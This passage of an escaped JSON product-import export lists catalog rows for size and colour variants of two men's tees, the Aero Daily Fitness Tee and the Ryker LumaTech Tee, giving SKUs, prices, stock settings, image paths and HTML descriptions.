null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"505\":{\"sku\":\"MS01-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-L-Black\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"506\":{\"sku\":\"MS01-L-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-L-Brown\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-l-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Brown\"},\"507\":{\"sku\":\"MS01-L-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-L-Yellow\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-l-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"508\":{\"sku\":\"MS01-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XL-Black\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"509\":{\"sku\":\"MS01-XL-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XL-Brown\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xl-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Brown\"},\"510\":{\"sku\":\"MS01-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee-XL-Yellow\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"aero-daily-fitness-tee-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"511\":{\"sku\":\"MS01\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Aero Daily Fitness Tee\",\"description\":\"<p>Need an everyday action tee that helps keep you dry? The Aero Daily Fitness Tee is made of 100% polyester wicking knit that funnels moisture away from your skin. Don\'t be fooled by its classic style; this tee hides premium performance technology beneath its unassuming look.<\\/p>\\n<p>Relaxed fit. <br \\/>Short-Sleeve. <br \\/>Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"24\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms01-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms01-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms01-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS01-XS-Black,size=XS,color=Black|sku=MS01-XS-Brown,size=XS,color=Brown|sku=MS01-XS-Yellow,size=XS,color=Yellow|sku=MS01-S-Black,size=S,color=Black|sku=MS01-S-Brown,size=S,color=Brown|sku=MS01-S-Yellow,size=S,color=Yellow|sku=MS01-M-Black,size=M,color=Black|sku=MS01-M-Brown,size=M,color=Brown|sku=MS01-M-Yellow,size=M,color=Yellow|sku=MS01-L-Black,size=L,color=Black|sku=MS01-L-Brown,size=L,color=Brown|sku=MS01-L-Yellow,size=L,color=Yellow|sku=MS01-XL-Black,size=XL,color=Black|sku=MS01-XL-Brown,size=XL,color=Brown|sku=MS01-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms01-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms01-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms01-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms01-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"512\":{\"sku\":\"MS02-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-XS-Black\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"513\":{\"sku\":\"MS02-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (V-neck)-XS-Blue\",\"description\":\"<p>Don\'t be fooled by its classic style; the Ryker LumaTech&trade; Tee embodies the future of performance apparel. Its featherweight blend of fabrics wicks away moisture to keep you cool and dry, whether racking up miles, hitting three pointers or strutting the boardwalk.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-v-neck-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_